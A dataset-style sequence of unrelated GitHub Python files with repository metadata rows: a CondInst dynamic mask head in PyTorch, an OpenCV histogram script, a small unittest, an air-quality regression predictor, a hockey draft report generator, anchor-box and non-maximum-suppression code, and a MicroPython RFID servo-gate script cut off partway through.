    assert params.size(1) == sum(weight_nums) + sum(bias_nums)
    num_insts = params.size(0)
    num_layers = len(weight_nums)
    # One split per layer's weights, then one per layer's biases.
    params_splits = list(torch.split_with_sizes(
        params, weight_nums + bias_nums, dim=1
    ))
    weight_splits = params_splits[:num_layers]
    bias_splits = params_splits[num_layers:]
    for l in range(num_layers):
        if l < num_layers - 1:
            # out_channels x in_channels x 1 x 1
            weight_splits[l] = weight_splits[l].reshape(num_insts * channels, -1, 1, 1)
            bias_splits[l] = bias_splits[l].reshape(num_insts * channels)
        else:
            # Final layer predicts a single mask channel per instance.
            weight_splits[l] = weight_splits[l].reshape(num_insts * 1, -1, 1, 1)
            bias_splits[l] = bias_splits[l].reshape(num_insts)
    return weight_splits, bias_splits
class DynamicMaskHead(nn.Module):
    """CondInst-style dynamic mask head.

    Per-instance conv filter parameters (``instances.mask_head_params``) are
    predicted elsewhere; this module reshapes them into a tiny per-instance
    conv net and applies it to the shared mask-branch features (optionally
    concatenated with relative coordinates) to produce one mask per instance.
    """
    def __init__(self, cfg):
        super(DynamicMaskHead, self).__init__()
        self.num_layers = cfg.MODEL.CONDINST.MASK_HEAD.NUM_LAYERS
        self.channels = cfg.MODEL.CONDINST.MASK_HEAD.CHANNELS
        self.in_channels = cfg.MODEL.CONDINST.MASK_BRANCH.OUT_CHANNELS
        self.mask_out_stride = cfg.MODEL.CONDINST.MASK_OUT_STRIDE
        self.disable_rel_coords = cfg.MODEL.CONDINST.MASK_HEAD.DISABLE_REL_COORDS
        # Per-FPN-level normalizers for the relative coordinates; the last
        # level gets twice the final size of interest.
        soi = cfg.MODEL.CONDINST.SIZES_OF_INTEREST
        self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2]))
        # Precompute how many weights/biases each dynamic conv layer consumes;
        # the first layer optionally takes 2 extra input channels (rel coords),
        # the last layer outputs a single mask channel.
        weight_nums, bias_nums = [], []
        for l in range(self.num_layers):
            if l == 0:
                if not self.disable_rel_coords:
                    weight_nums.append((self.in_channels + 2) * self.channels)
                else:
                    weight_nums.append(self.in_channels * self.channels)
                bias_nums.append(self.channels)
            elif l == self.num_layers - 1:
                weight_nums.append(self.channels * 1)
                bias_nums.append(1)
            else:
                weight_nums.append(self.channels * self.channels)
                bias_nums.append(self.channels)
        self.weight_nums = weight_nums
        self.bias_nums = bias_nums
        self.num_gen_params = sum(weight_nums) + sum(bias_nums)
        self.register_buffer("_iter", torch.zeros([1]))
    def mask_heads_forward(self, features, weights, biases, num_insts):
        '''
        Run the per-instance dynamic conv net.

        :param features: (1, num_insts * in_channels, H, W) stacked inputs
        :param weights: [w0, w1, ...] per-layer grouped-conv weights
        :param biases: [b0, b1, ...] per-layer grouped-conv biases
        :return: (1, num_insts, H, W) mask logits before reshaping
        '''
        assert features.dim() == 4
        n_layers = len(weights)
        x = features
        for i, (w, b) in enumerate(zip(weights, biases)):
            # groups=num_insts keeps every instance's computation independent.
            x = F.conv2d(
                x, w, bias=b,
                stride=1, padding=0,
                groups=num_insts
            )
            if i < n_layers - 1:
                x = F.relu(x)
        return x
    def mask_heads_forward_with_coords(
            self, mask_feats, mask_feat_stride, instances
    ):
        """Build per-instance inputs (features [+ rel coords]) and predict mask logits."""
        # (H*W, 2) absolute pixel locations of the mask-feature grid.
        locations = compute_locations(
            mask_feats.size(2), mask_feats.size(3),
            stride=mask_feat_stride, device=mask_feats.device
        )
        n_inst = len(instances)
        im_inds = instances.im_inds
        mask_head_params = instances.mask_head_params
        N, _, H, W = mask_feats.size()
        if not self.disable_rel_coords:
            # Coordinates of each grid cell relative to the instance's
            # location, normalized by the FPN level's size of interest.
            instance_locations = instances.locations
            relative_coords = instance_locations.reshape(-1, 1, 2) - locations.reshape(1, -1, 2)
            relative_coords = relative_coords.permute(0, 2, 1).float()
            soi = self.sizes_of_interest.float()[instances.fpn_levels.view(-1).long()]
            relative_coords = relative_coords / soi.reshape(-1, 1, 1)
            relative_coords = relative_coords.to(dtype=mask_feats.dtype)
            mask_head_inputs = torch.cat([
                relative_coords, mask_feats[im_inds].reshape(n_inst, self.in_channels, H * W)
            ], dim=1)
        else:
            mask_head_inputs = mask_feats[im_inds].reshape(n_inst, self.in_channels, H * W)
        # Stack all instances along the channel axis for grouped conv.
        mask_head_inputs = mask_head_inputs.reshape(1, -1, H, W)
        weights, biases = parse_dynamic_params(
            mask_head_params, self.channels,
            self.weight_nums, self.bias_nums
        )
        mask_logits = self.mask_heads_forward(mask_head_inputs, weights, biases, n_inst)
        mask_logits = mask_logits.reshape(-1, 1, H, W)
        # Upsample logits from the feature stride to the output stride.
        assert mask_feat_stride >= self.mask_out_stride
        assert mask_feat_stride % self.mask_out_stride == 0
        mask_logits = aligned_bilinear(mask_logits, int(mask_feat_stride / self.mask_out_stride))
        return mask_logits
    def __call__(self, mask_feats, mask_feat_stride, pred_instances, gt_instances=None):
        """Training: return {"loss_mask": ...}; inference: attach pred_global_masks."""
        if self.training:
            losses = {}
            if len(pred_instances) == 0:
                # Keep the graph connected so backward still works with no instances.
                dummy_loss = mask_feats.sum() * 0 + pred_instances.mask_head_params.sum() * 0
                losses["loss_mask"] = dummy_loss
            else:
                gt_inds = pred_instances.gt_inds
                gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances if per_im.has("gt_bitmasks")])
                gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=mask_feats.dtype)
                mask_logits = self.mask_heads_forward_with_coords(
                    mask_feats, mask_feat_stride, pred_instances
                )
                mask_scores = mask_logits.sigmoid()
                mask_losses = dice_coefficient(mask_scores, gt_bitmasks)
                loss_mask = mask_losses.mean()
                losses["loss_mask"] = loss_mask
            return losses
        else:
            if len(pred_instances) > 0:
                mask_logits = self.mask_heads_forward_with_coords(
                    mask_feats, mask_feat_stride, pred_instances
                )
                pred_instances.pred_global_masks = mask_logits.sigmoid()
            return pred_instances
def build_dynamic_mask_head(cfg):
    """Factory: construct the CondInst dynamic mask head from the config."""
    return DynamicMaskHead(cfg)
| PeizeSun/OneNet | projects/OneSeg/oneseg/mask_head_dynamic.py | mask_head_dynamic.py | py | 6,648 | python | en | code | 640 | github-code | 90 |
21304415003 | from turtle import color
import cv2 as cv
import numpy as np
from matplotlib import pyplot as plt
#read image
img = cv.imread(r"C:\Users\amora\OneDrive\Documents\Visual Studio Code\Course_Imageproccesing2\photos\group 2.jpg")
#________________________method 1 ______________________________#
plt.hist(img.ravel() , 256 , (0 , 256) )
plt.show()
#________________________method 2 ______________________________#
colors = ['r' , 'g' , 'b']
for i , col in enumerate(colors) :
hist = cv.calcHist([img] , [i] , None , [256] , [0 , 256])
#open new figure
plt.figure()
#make title for graph
plt.title('Histograms')
plt.plot(hist , color = col)
plt.xlim([0 , 256])
plt.show() | es-OmarHani/ImageProcessing_2 | #histograms/histograms.py | histograms.py | py | 702 | python | en | code | 0 | github-code | 90 |
6507397659 | import unittest
import struct
class Test_test1(unittest.TestCase):
    """Sanity tests plus a scratch check of big-endian 16-bit packing."""
    def test_A(self):
        # Trivial smoke test.
        self.assertEqual(1, 1)
    def test_A2(self):
        # Pack 1500 as a big-endian signed short and show its two bytes
        # (0x05, 0xDC). FIX: removed the unused/misleading local
        # ``speed = 1000`` -- the literal 1500 was what got packed.
        speedInBytes = bytes(struct.pack('>h', 1500))
        print('{} {}'.format(speedInBytes[0], speedInBytes[1]))
        self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
| Eurostar64/RailuinoSrcp | PythonSrcpServer/test1.py | test1.py | py | 442 | python | en | code | 0 | github-code | 90 |
24772107611 | # Load model parameters to test
import model
import load
import pandas
import numpy as np
import argparse
import train_multiple_models as train_mm
import os
import train
def load_trainer(model_path):
    """Instantiate a LinearRegression in inference mode and load saved weights from ``model_path``."""
    trainer = model.LinearRegression(train=False)
    trainer.load_model(model_path)
    return trainer
def filter_attributes(data, filename):
    """Keep only the columns of ``data`` selected by the boolean mask stored in ``filename`` (.npy)."""
    with open(filename, 'rb') as mask_file:
        column_mask = np.load(mask_file)
    return data[:, column_mask]
def clean_data(data, attributes_filename, data_bounds_filename):
    """Clip outliers in flattened test data using bounds saved at training time.

    Each out-of-bounds value is replaced with the previous row's value
    (or the attribute's middle mean for the first row).
    """
    def _check_bound(num, l_bound, u_bound):
        # FIX: the third parameter was named ``r_bound`` but the body read
        # ``u_bound`` from the enclosing loop via closure -- it only worked
        # by accident. The parameter is now actually used.
        return num >= u_bound or num <= l_bound
    data_bounds = get_data_bounds(data_bounds_filename)
    total_testing_data = data.shape[0]
    data = data.reshape(-1, 18)  # 18 raw attributes per hourly record
    data, total_attr, PM_index = \
            train.filter_attributes(data, attributes_filename)
    for attr_index in range(data.shape[1]):
        l_bound, u_bound, middle_mean = data_bounds[attr_index]
        if attr_index == PM_index:
            u_bound = 200  # PM2.5 gets a wider, hand-chosen upper bound
        for i in range(data.shape[0]):
            if _check_bound(data[i][attr_index], l_bound, u_bound):
                if i != 0:
                    data[i][attr_index] = data[i-1][attr_index]
                else:
                    data[i][attr_index] = middle_mean
    return data.reshape(total_testing_data, -1)
def get_data_bounds(filename):
    """Load the per-attribute (lower, upper, middle-mean) bounds array saved during training."""
    with open(filename, 'rb') as bounds_file:
        return np.load(bounds_file)
def get_args():
    """Build and parse command-line arguments for test-time prediction."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--model_main',
            required=True,
            help='The training model parameters path,\
                    this is the main one.')
    parser.add_argument('--model_minor',
            default=None,
            help='The training model parameters path,\
                    this is the minor one,\
                    a total of five small models.')
    parser.add_argument('-t','--testing_filename',
            default='data/test.csv',
            help='The testing.csv file path')
    parser.add_argument('-o','--output',
            default='ans.csv',
            help='The output testing prediction filename')
    parser.add_argument('--attributes_filename',
            default='models/attributes_PM2.5_PM10.npy',
            help='The attributes used boolean file')
    parser.add_argument('--data_bounds_filename',
            default='models/data_bounds.npy',
            help='The data bounds used in training,\
                    required loaded to filter out\
                    possible invalid data.')
    return parser.parse_args()
if __name__ == '__main__':
args = get_args()
main_model_path = args.model_main
trainer = load_trainer(main_model_path)
if args.model_minor is not None:
small_trainer = []
for i in range(8):
small_trainer.append(load_trainer(
os.path.join(args.model_minor, \
'split_%d'%i, 'model_e1000.npy')))
#split_values = [2, 14, 22, 30, 40, 130]
split_values = [2, 14, 22, 30, 40, 60, 80, 100, 130]
test_path = args.testing_filename
testing_data = load.load_test_csv(test_path)
testing_data = clean_data(testing_data,
args.attributes_filename,
args.data_bounds_filename)
output_path = args.output
outputs = [['id', 'value']]
for i in range(testing_data.shape[0]):
test_x = testing_data[i]
prediction = trainer.forward(test_x)
if args.model_minor is not None:
model_index = train_mm.get_split_index(prediction, split_values)
final_prediction = small_trainer[model_index].forward(test_x)
if np.abs(prediction-final_prediction) > 5 or \
prediction < 2 or final_prediction < 2 or\
(test_x.reshape(9,-1)[:,-1] > 89).any():
#print('id_%d, last:[%.1f,%.1f,%.1f], main:%.3f, minor:%.3f' % (i, test_x.reshape(9,-1)[-3,-1], test_x.reshape(9,-1)[-2,-1], test_x.reshape(9,-1)[-1,-1], prediction, final_prediction))
#final_prediction = np.mean(np.concatenate([test_x.reshape(9,-1)[-2:,-1], prediction]))
#print(final_prediction)
final_prediction = np.mean(test_x.reshape(9,-1)[-3:,-1])
else:
final_prediction = np.mean([prediction, final_prediction])
outputs.append(['id_%d' % i, final_prediction])
else:
outputs.append(['id_%d' % i, prediction[0]])
pandas.DataFrame(outputs).to_csv(output_path,
header=False, index=False)
| kaikai4n/ML2018FALL | hw1/hw1.py | hw1.py | py | 4,577 | python | en | code | 1 | github-code | 90 |
8967007147 | import numpy as np
from Sobel import get_image
from PIL import Image, ImageDraw
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from IoU import get_iou, get_iou_dict
import random
class Anchor():
    """Axis-aligned box described by its size (w, h) and center point (x, y)."""
    def __init__(self, width, height, x_center, y_center) -> None:
        self.w, self.h = width, height
        self.x, self.y = x_center, y_center
    def get_top_left(self):
        """Corner with the smallest x and y (half-sizes floored via //)."""
        half_w, half_h = self.w // 2, self.h // 2
        return (self.x - half_w, self.y - half_h)
    def get_bottom_right(self):
        """Corner with the largest x and y."""
        half_w, half_h = self.w // 2, self.h // 2
        return (self.x + half_w, self.y + half_h)
def get_anchor_centers(image: np.ndarray, grid_size=40):
    '''
    Gets the anchor centers to generate region proposals: the image is split
    into a grid_size x grid_size grid and the center of every cell is returned
    as an (grid_size**2, 2) float array of (x, y) pairs.

    NOTE(review): assumes a roughly square image -- the step is derived from
    shape[0] but applied to both axes (as in the original); confirm for
    non-square inputs.
    '''
    step = image.shape[0] // grid_size
    # FIX: arange previously stopped at shape[0]/shape[1], silently dropping
    # the last grid row and column of centers; extend the end point by one
    # step so every cell gets a center.
    xs = np.arange(step, image.shape[0] + step, step) - step // 2
    ys = np.arange(step, image.shape[1] + step, step) - step // 2
    # Same ordering as the original nested loops: x outer, y inner.
    grid_x, grid_y = np.meshgrid(xs, ys, indexing='ij')
    return np.stack([grid_x.ravel(), grid_y.ravel()], axis=1).astype(float)
def get_anchors(scales: list[float], ratios: list[float], x_center: int, y_center: int, base_size: int = 32):
    '''
    Returns a list of anchor boxes around the same (x,y) center
    anchor: (width, height, x_center, y_center)

    NOTE(review): ratios and scales are used with numpy arithmetic
    (division/multiplication), so numpy arrays are expected despite the
    list[float] annotations -- confirm at call sites.
    '''
    anchor = np.array([base_size, base_size, 0, 0])
    # One (w, h) per aspect ratio, preserving the base area.
    dims = ratio_enum(anchor, ratios)
    arr = []
    for dim in dims:
        # Expand each ratio'd shape across all scales.
        arr.append(scale_enum(dim, scales))
    arr = np.vstack(arr)
    # Stamp the shared center into columns 2-3 of every anchor.
    arr[:,2] = x_center
    arr[:,3] = y_center
    return arr
def ratio_enum(anchor: np.array, ratios):
    '''
    Enumerate one (w, h) pair per aspect ratio, preserving the anchor's area.
    Returns an (len(ratios), 4) array; the center columns are left at zero.
    '''
    w, h, _x, _y = anchor
    area = w * h
    widths = np.round(np.sqrt(area / ratios))
    heights = np.round(widths * ratios)
    dims = np.zeros((len(ratios), 4))
    dims[:, 0] = widths
    dims[:, 1] = heights
    return dims
def scale_enum(anchor, scales):
    """
    Enumerate one anchor per scale by multiplying the width and height.
    Returns an (len(scales), 4) array; the center columns are left at zero.
    """
    w, h, _x, _y = anchor
    dims = np.zeros((len(scales), 4))
    dims[:, 0] = w * scales
    dims[:, 1] = h * scales
    return dims
def add_boxes_to_image(image, anchors):
    """Show `image` with each (w, h, x_c, y_c) anchor drawn in red.

    Also draws a fixed blue rectangle at (70, 41) sized 120x155 —
    presumably the hard-coded ground-truth box for dandi_test.jpg
    (matches the ground_truth used in __main__); TODO confirm.
    Blocks until the matplotlib window is closed.
    """
    fig, ax = plt.subplots()
    ax.imshow(image)
    for i in range(len(anchors)):
        # Convert center-based (w, h, x_c, y_c) to top-left corner.
        coord = (anchors[i][2] - anchors[i][0]//2,anchors[i][3] - anchors[i][1]//2)
        rect = patches.Rectangle(coord, anchors[i][0], anchors[i][1], linewidth=1, edgecolor='r', facecolor='none')
        ax.add_patch(rect)
    rect = patches.Rectangle((70,41), 120, 155, linewidth=2, edgecolor='b', facecolor='none')
    ax.add_patch(rect)
    plt.show()

def add_dots(image, centers):
    """Show `image` with a small red dot at every (x, y) center."""
    fig, ax = plt.subplots()
    ax.imshow(image)
    for x, y in centers:
        circle = patches.Circle((x,y), 1, facecolor='red')
        ax.add_patch(circle)
    plt.show()

def temp(image, anchors, ground_truth, i):
    """Debug view: draw anchor `i` (red) and `ground_truth` (blue).

    Both boxes are (w, h, x_center, y_center) tuples.
    """
    fig, ax = plt.subplots()
    ax.imshow(image)
    coord = (anchors[i][2] - anchors[i][0]//2,anchors[i][3] - anchors[i][1]//2)
    rect = patches.Rectangle(coord, anchors[i][0], anchors[i][1], linewidth=1, edgecolor='r', facecolor='none')
    ax.add_patch(rect)
    coord = (ground_truth[2] - ground_truth[0]//2, ground_truth[3] - ground_truth[1]//2)
    rect = patches.Rectangle(coord, ground_truth[0], ground_truth[1], linewidth=2, edgecolor='b', facecolor='none')
    ax.add_patch(rect)
    plt.show()
def get_all_anchors(centers, scales, ratios, image_dim, base_size=45):
    """
    Generate one anchor per (center, scale, ratio) combination and keep
    only those fully inside the image.

    Bug fix: the ``base_size`` argument was previously ignored (a literal
    32 was passed to get_anchors regardless); it is now honored.

    centers: iterable of (x, y) anchor centers
    image_dim: (width, height)-like shape used for the bounds check
    returns: list of [w, h, x_center, y_center] anchors
    """
    all_anchors = []
    for x, y in centers:
        for w, h, x_c, y_c in np.ndarray.tolist(get_anchors(scales, ratios, x, y, base_size)):
            # Keep the anchor only if every edge lies inside the image.
            if (x_c - w // 2 >= 0 and x_c + w // 2 <= image_dim[0]
                    and y_c - h // 2 >= 0 and y_c + h // 2 <= image_dim[1]):
                all_anchors.append([w, h, x_c, y_c])
    return all_anchors
def get_positive_boxes(anchors, ground_truth):
    """Split anchors into positives (IoU > 0.7) and negatives (IoU < 0.3).

    Anchors with IoU in [0.3, 0.7] are discarded.  If no anchor clears
    0.7, the single best-overlapping anchor is used as the positive so
    the list is never empty.  Returns two lists of (anchor, iou) pairs.
    """
    pos_anchors = []
    neg_anchors = []
    # Track the best match seen so far as a fallback positive.
    highest = ((0,0,0,0), 0)
    for anchor in anchors:
        iou = get_iou(anchor, ground_truth)
        if iou > 0.7:
            pos_anchors.append((anchor, iou))
        if iou < 0.3:
            neg_anchors.append((anchor, iou))
        if iou > highest[1]:
            highest = (anchor, iou)
    if len(pos_anchors) == 0:
        pos_anchors.append(highest)
    return pos_anchors, neg_anchors
def mergeSort(arr):
    """
    Sort `arr` in place (and return it) in descending order of each
    element's second item, using recursive merge sort.  On equal keys the
    element from the right half is emitted first (same tie order as the
    strict `>` comparison in the merge step).
    """
    if len(arr) <= 1:
        return arr
    middle = len(arr) // 2
    left = mergeSort(arr[:middle].copy())
    right = mergeSort(arr[middle:].copy())
    out = li = ri = 0
    # Merge: repeatedly take the larger head of the two sorted halves.
    while li < len(left) and ri < len(right):
        if left[li][1] > right[ri][1]:
            arr[out] = left[li]
            li += 1
        else:
            arr[out] = right[ri]
            ri += 1
        out += 1
    # One of the halves is exhausted; copy over whatever remains.
    for item in left[li:]:
        arr[out] = item
        out += 1
    for item in right[ri:]:
        arr[out] = item
        out += 1
    return arr
def non_max_threshold(anchors: np.array, threshold: float=0.5):
    '''
    Non-maximum suppression over scored anchors.

    input:  anchors -> list of (anchor, iou) pairs
    output: kept    -> list of (anchor, iou) pairs, best-first, where no
                       kept anchor overlaps another kept anchor by more
                       than `threshold` IoU.

    Bug fix: the original compared the current best against
    ``anchors[i]`` while deleting ``temp_anchors[i]`` (index shifted by
    one), so the first comparison was best-vs-itself and every
    suppression decision was applied to the wrong candidate.  It also
    sorted the caller's list in place; this version works on a copy.
    '''
    assert 0.0 < threshold < 1.0
    remaining = mergeSort(list(anchors))  # best score first
    kept = []
    while remaining:
        best = remaining[0]
        kept.append(best)
        # Drop every remaining candidate that overlaps `best` too much.
        remaining = [cand for cand in remaining[1:]
                     if get_iou(best[0], cand[0]) <= threshold]
    return kept
def get_sample_neg(anchors, num_anchors):
    """
    Stratified random sample: split the first part of `anchors` into
    `num_anchors` equal-width intervals and pick one element uniformly
    at random from each, preserving interval order.
    """
    stride = len(anchors) // num_anchors
    return [anchors[random.randint(k * stride, (k + 1) * stride - 1)]
            for k in range(num_anchors)]
def iou_test():
    """Smoke test for the dict-based IoU helper.

    The two boxes are disjoint (x ranges 70-190 vs 233-255), so the
    printed IoU is expected to be 0.
    """
    box1 = {}
    box1["x1"] = 70
    box1["x2"] = 190
    box1["y1"] = 41
    box1["y2"] = 196
    box2 = {}
    box2["x1"] = 233
    box2["x2"] = 255
    box2["y1"] = 206
    box2["y2"] = 255
    #print(get_iou(anchors[idx], ground_truth))
    print(get_iou_dict(box1, box2))
if __name__ == "__main__":
    # Demo pipeline: generate anchors over a sample image, label them
    # against a hand-picked ground-truth box, then visualize negatives,
    # positives, and the post-NMS positives.
    image = get_image("sample_images/dandi_test.jpg")
    ctrs = get_anchor_centers(image, 20)
    scales = np.array([1, 2, 4])
    ratios = np.array([0.5, 1, 2])
    anchors = np.ndarray.tolist(get_anchors(scales, ratios, 128, 128, 32))
    # image = Image.open("sample_images/dandi_test.jpg")
    # add_boxes_to_image(image, anchors)
    # add_dots(image, ctrs)
    idx = 5
    # bounding box for dandi_test.jpg
    # Format is (w, h, x_center, y_center) — see how temp() unpacks it.
    ground_truth = (120, 155, 130, 118)
    #temp(image, anchors, idx)
    all_anchors = get_all_anchors(ctrs, scales, ratios, image.shape, 45)
    pos_anchors, neg_anchors = get_positive_boxes(all_anchors, ground_truth)
    # Visualize 20 stratified negative samples, then all positives.
    samples = np.array(get_sample_neg(neg_anchors, 20))
    pos_anchors = np.array(pos_anchors)
    add_boxes_to_image(image, samples[:,0])
    add_boxes_to_image(image, pos_anchors[:,0])
    # Finally the positives that survive non-maximum suppression.
    thres_anchors = np.array(non_max_threshold(pos_anchors, 0.5))
    add_boxes_to_image(image, thres_anchors[:,0])
    #temp(image, anchors, ground_truth, idx)
| huffman19/plant-rec | anchors.py | anchors.py | py | 8,348 | python | en | code | 0 | github-code | 90 |
71580663017 | import os
import re
import pandas as pd
# Column accumulator for the draft table: one list per column, with one
# entry appended per drafted player as the CSB text file is parsed below.
# Keys: bio fields (Rank..Leaugue), season stats (GP..PIM), then letter-
# graded skill ratings (FI..SR) and summary grades (OFF/DEF/OVE).
Draftee = {
    'Rank' : [],
    'Name' : [],
    'Pos' : [],
    'Shot' : [],
    'Age' : [],
    'DoB' : [],
    'Height' : [],
    'Weight' : [],
    'Country' : [],
    'Team' : [],
    'Leaugue' : [],
    'GP' : [],
    'G' : [],
    'A' : [],
    'Pts' : [],
    '+/-' : [],
    'PIM' : [],
    'FI' : [],
    'SH' : [],
    'PL' : [],
    'ST' : [],
    'CH' : [],
    'PO' : [],
    'HI' : [],
    'SK' : [],
    'EN' : [],
    'PE' : [],
    'FA' : [],
    'LE' : [],
    'SR' : [],
    'OFF' : [],
    'DEF' : [],
    'OVE' : [],
    }
def colour_rating(value):
    """Map a letter-grade cell to a CSS text colour.

    A -> red, B -> blue, C -> grey, anything else -> black.
    The first matching letter wins (checked A, then B, then C), matching
    the original substring-based checks.
    """
    grade = str(value)
    for letter, colour in (("A", "red"), ("B", "blue"), ("C", "grey")):
        if letter in grade:
            return "color: %s" % colour
    return "color: black"
def colour_offense(value):
    # Styler hook: offense columns get a purple background (value unused).
    return "background-color: purple"

def colour_defense(value):
    # Styler hook: defense columns get an orange background (value unused).
    return "background-color: orange"

def colour_overall(value):
    # Styler hook: overall columns get a green background (value unused).
    return "background-color: green"
# Parse the exported CSB text dump into the Draftee columns, then render
# a colour-coded HTML table under <repo root>/Reports/Draft.html.
print("Preparing to compile CSB. ")
dir = os.path.dirname(os.path.abspath(__file__))
main_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# NOTE(review): raw backslashes in this Windows path rely on \H and \C not
# being recognized escapes — fragile; a raw string would be safer.
fname = os.path.join(main_dir,"Data Exporters\Hidden Data\CSB.txt")
with open(fname) as f:
    content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
print("Analyzing CSB text")
# Each player is a fixed-format run of lines; a line containing '#'
# marks the start of a new player and resets the per-player line counter.
# NOTE(review): if the file does not begin with a '#' line, line_num is
# used before assignment and this loop raises NameError.
for line in content:
    text = line.split()
    if "#" in line:
        ##start of a new player
        line_num = 1
    if line_num == 1:
        # Line 1: "#<rank> <first> <last> <pos> ...shot"
        Draftee['Rank'].append(int(line[1:line.find(text[1])-1]))
        # NOTE(review): str.decode does not exist in Python 3 — this line
        # is Python-2-only and raises AttributeError under Python 3.
        Name = str(text[1] + " " + text[2]).decode('utf-8').encode('ascii','ignore')
        Draftee['Name'].append(Name)
        Draftee['Pos'].append(text[3])
        Draftee['Shot'].append(text[4][5:])
    elif line_num == 2:
        # Line 2: age / date of birth / height / weight.
        Draftee['Age'].append(int(text[1]))
        Draftee['DoB'].append(text[3])
        Draftee['Height'].append(text[5])
        Draftee['Weight'].append(text[7])
    elif line_num == 3:
        # Line 3: "Country: X Team: Y League: Z" — sliced by label offsets.
        Country = line.find("Country: ")
        Team = line.find("Team: ")
        League = line.find("League: ")
        Draftee['Country'].append(line[Country+len("Country: "):Team-1])
        Draftee['Team'].append(line[Team+len("Team: "):League-1])
        Draftee['Leaugue'].append(line[League+len("League: "):])
    elif line_num == 4:
        # Line 4: season stat line (games, goals, assists, ...).
        Draftee['GP'].append((int(text[1])))
        Draftee['G'].append((int(text[3])))
        Draftee['A'].append((int(text[5])))
        Draftee['Pts'].append((int(text[7])))
        Draftee['+/-'].append((int(text[9])))
        Draftee['PIM'].append(text[11])
    # elif line_num == 5:
        #skip
    elif line_num == 6:
        # Line 6: first row of skill grades.
        Draftee['SH'].append(text[1])
        Draftee['PL'].append(text[3])
        Draftee['ST'].append(text[5])
        Draftee['CH'].append(text[7])
        Draftee['PO'].append(text[9])
        Draftee['HI'].append(text[11])
    elif line_num == 7:
        # Line 7: second row of skill grades.
        Draftee['SK'].append(text[1])
        Draftee['EN'].append(text[3])
        Draftee['PE'].append(text[5])
        Draftee['FA'].append(text[7])
        Draftee['LE'].append(text[9])
        Draftee['SR'].append(text[11])
        Draftee['FI'].append(text[13])
    elif line_num == 8 :
        # Line 8: summary grades.
        Draftee['OFF'].append(text[1])
        Draftee['DEF'].append(text[3])
        Draftee['OVE'].append(text[5])
    # elif line_num > 9 :
        #skip
    elif line_num > 12:
        # Safety valve: should never trigger for a well-formed export.
        print("INFINITE LOOP OR SOMETHING! AHHHHHHHHHHHHHH!!!!!!!!")
        break
    line_num += 1
print("Committing data to tables.")
# Build the DataFrame, force the column order, and sort by draft rank.
Draft = pd.DataFrame(Draftee)
Draft = Draft[['Rank', 'Name', 'Pos', 'Shot', 'Age', 'DoB', 'Height', 'Weight', 'Country', 'Team', 'Leaugue', 'GP', 'G', 'A', 'Pts', '+/-', 'PIM', 'FI', 'SH', 'PL', 'ST', 'CH', 'PO', 'HI', 'SK', 'EN', 'PE', 'FA', 'LE', 'SR', 'OFF', 'DEF', 'OVE']]
Draft = Draft.sort_values(by=['Rank'], ascending = True)
# Apply the background colours per column group, then the per-grade text
# colour on top, and render to an HTML string.
html = (Draft.style.\
    set_properties(**{'border-width' : 'thin', 'border-color' : 'black'}).\
    applymap(colour_offense, subset=['SH', 'PL', 'ST', 'OFF']).\
    applymap(colour_defense, subset=['CH', 'PO', 'HI', 'DEF']).\
    applymap(colour_overall, subset=['SK', 'EN', 'PE', 'FA', 'LE', 'SR', 'OVE']).\
    applymap(colour_rating, subset=['SH', 'PL', 'ST', 'OFF', 'CH', 'PO', 'HI', 'DEF', 'SK', 'EN', 'PE', 'FA', 'LE', 'SR', 'OVE']).render())
# Draft.style
print("Exporting data to .html file")
reports_dir = os.path.join(main_dir,'Reports')
if not os.path.exists(reports_dir):
    os.makedirs(reports_dir)
with open(os.path.join(reports_dir,'Draft.html'), 'w') as f:
    f.write(html)
# Draft.to_html(os.path.join(reports_dir,'Draft.html'),index = False, columns = ['Rank', 'Name', 'Pos', 'Shot', 'Age', 'DoB', 'Height', 'Weight', 'Country', 'Team', 'Leaugue', 'GP', 'G', 'A', 'Pts', '+/-', 'PIM', 'FI', 'SH', 'PL', 'ST', 'CH', 'PO', 'HI', 'SK', 'EN', 'PE', 'FA', 'LE', 'SR', 'OFF', 'DEF', 'OVE'])
44055165323 | from mfrc522 import MFRC522
from machine import Pin
from machine import Pin, PWM
import utime
import tm1637
from time import sleep_ms,sleep
# Hardware setup (Raspberry Pi Pico / MicroPython): 4-digit TM1637
# display, status LEDs, and a hobby servo on PWM pin 16.
tm = tm1637.TM1637(clk=Pin(13), dio=Pin(12))
green_led = Pin(25, Pin.OUT)
red_led = Pin(15, Pin.OUT)
servoPin = PWM(Pin(16))
servoPin.freq(50) # 50 Hz (20 ms period — fixed; other values make the servo misbehave)
def servo(degrees):
    """Move the servo to `degrees` (clamped to 0-180) by setting the PWM duty."""
    if degrees > 180: degrees = 180
    if degrees < 0: degrees = 0
    # duty_u16 resolution: 20 ms / 65535 counts ~= 0.000305 ms per count.
    maxDuty = 9000 # 9000 counts ~= 2.75 ms pulse
    minDuty = 1000 # 1000 counts ~= 0.31 ms pulse
    # Linear map from angle to duty between the two endpoints.
    newDuty = minDuty+(maxDuty-minDuty)*(degrees/180)
    servoPin.duty_u16(int(newDuty))
# 將卡號由 2 進位轉換為 16 進位的字串
def uidToString(uid):
    """Render a UID byte sequence as an uppercase hex string.

    Each byte is prepended as it is read, so the output shows the bytes
    in reverse of their list order (e.g. [0x01, 0xAB] -> "AB01").
    """
    return "".join("%02X" % b for b in reversed(uid))
# MFRC522 RFID reader on SPI0.  Poll for cards forever: an authorized
# card opens the servo "gate" and lights the green LED; any other card
# shows an error pattern and lights the red LED.  Ctrl-C exits cleanly.
reader = MFRC522(spi_id=0,sck=2,miso=4,mosi=3,cs=26,rst=10)
print("..... 請將卡片靠近感應器.....")
try:
    while True:
        (stat, tag_type) = reader.request(reader.REQIDL) # poll for an RFID card
        if stat == reader.OK: # a card was found
            (stat, uid) = reader.SelectTagSN()
            if stat == reader.OK:
                card_num = uidToString(uid)
                print(".....卡片號碼: %s" % card_num)
                if card_num == '202E30A0':#'7A811D60':
                    # Authorized card: show a pattern, sweep the servo open.
                    tm.write([0b00000000, 0b00111101, 0b00111111, 0b00000000])
                    for degree in range(0, 180, 1):
                        servo(degree)
                        sleep(0.01)
                    print('....Welcome....')
